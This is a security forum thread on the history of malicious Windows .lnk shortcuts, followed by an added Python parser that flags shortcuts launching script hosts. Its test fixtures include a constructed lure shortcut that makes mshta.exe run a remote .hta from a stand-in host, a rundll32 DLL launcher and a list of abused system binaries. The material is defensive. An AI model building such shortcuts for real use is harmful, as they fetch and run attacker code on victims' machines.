They were used at least as far back as 2010:

Downloader-CJX Cashing In on Microsoft .LNK Flaw
http://www.avertlabs.com/research/blog/index.php/category/exploit-research/

Microsoft Security Bulletin MS10-046 - Critical: Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198), Published: August 02, 2010
https://technet.microsoft.com/en-us/library/security/ms10-046.aspx

As with so many exploits patched by Microsoft, many users did not patch, so the exploit continued to be used successfully for quite a while.

“double click for content” is an old lure that goes back at least to 2009. An RTF example: http://rsjphoto.net/computing/rtf/

There you go!
---- rich
The difference between the current .lnk malware and past use is that those exploited vulnerabilities. The current strain of malware is using .lnk files as designed, but using them to run legit processes such as mshta.exe to in turn run malware-laced scripts and the like. Nothing like using Windows to infect Windows.
Yes! In one sense, though, many exploits use Windows to infect Windows - the original LNK exploit used a vulnerability in the Windows Shell. Not using a legitimate file as in this case, of course... which reminds me of Conficker's later versions which used autorun to start rundll32.exe to run its malicious DLL.
---- rich
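The two comments above describe the same pattern from different years: a shortcut (or autorun entry) that points at a legitimate Windows binary such as mshta.exe or rundll32.exe and hands it attacker-controlled arguments. The following is an added example, not code posted in this thread. It builds a few constructed .lnk files in memory using the documented Shell Link layout (76-byte header, optional LinkTargetIDList and LinkInfo, then the StringData fields), parses them back, and flags any shortcut whose target is a known script host and which carries command-line arguments. The SCRIPT_HOSTS list, the sample paths and the example.invalid URL are assumptions made for the demonstration.

```python
"""Minimal MS-SHLLINK (.lnk) parser plus a script-host-target check.

Added example for this thread, not code from any of the posters. All
shortcuts below are constructed in memory; no files are written or read.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits from the Shell Link header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Legitimate Windows binaries commonly used to run attacker-supplied scripts
# or DLLs. Assumed for the example; it is not an exhaustive catalogue.
SCRIPT_HOSTS = {
    "mshta.exe", "rundll32.exe", "powershell.exe", "wscript.exe",
    "cscript.exe", "cmd.exe", "regsvr32.exe", "certutil.exe",
}


def build_lnk(relative_path, working_dir="", arguments="", name=""):
    """Assemble a minimal Unicode .lnk carrying only the StringData fields we need."""
    flags = IS_UNICODE
    if name:
        flags |= HAS_NAME
    if relative_path:
        flags |= HAS_RELATIVE_PATH
    if working_dir:
        flags |= HAS_WORKING_DIR
    if arguments:
        flags |= HAS_ARGUMENTS
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    # FileAttributes, three zero FILETIMEs, then FileSize, IconIndex,
    # ShowCommand (SW_SHOWNORMAL = 1), HotKey, Reserved1, Reserved2, Reserved3.
    header += struct.pack("<I", 0) + b"\x00" * 24
    header += struct.pack("<IIIHHII", 0, 0, 1, 0, 0, 0, 0)
    assert len(header) == 76
    body = b""
    # StringData order is fixed: NAME, RELATIVE_PATH, WORKING_DIR, ARGUMENTS.
    for s in (name, relative_path, working_dir, arguments):
        if s:
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a .lnk as a dict (plus the raw flags)."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize excludes itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags}
    for key, flag in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # characters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def suspicious_target(fields):
    """Reason string if the shortcut runs a script host with arguments, else None."""
    path = fields.get("relative_path", "")
    exe = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = fields.get("arguments", "")
    if exe in SCRIPT_HOSTS and args:
        return f"{exe} launched with arguments: {args[:80]}"
    return None


# Constructed samples, not real-world files.
LURE_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\mshta.exe",
    working_dir="C:\\Windows\\System32",
    arguments="http://example.invalid/invoice.hta",
    name="Invoice (double click to view)",
)
DLL_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\rundll32.exe",
    arguments="C:\\Users\\Public\\update.dll,Start",
)
BENIGN_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\notepad.exe",
    working_dir="C:\\Users\\user\\Documents",
)

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("dll", DLL_LNK), ("benign", BENIGN_LNK)):
        print(label, suspicious_target(parse_lnk(blob)))
```

Real shortcuts usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their declared sizes, so the check still works on them, but a lure that sets the target only in the IDList (no RELATIVE_PATH string) would need the ItemID entries decoded as well.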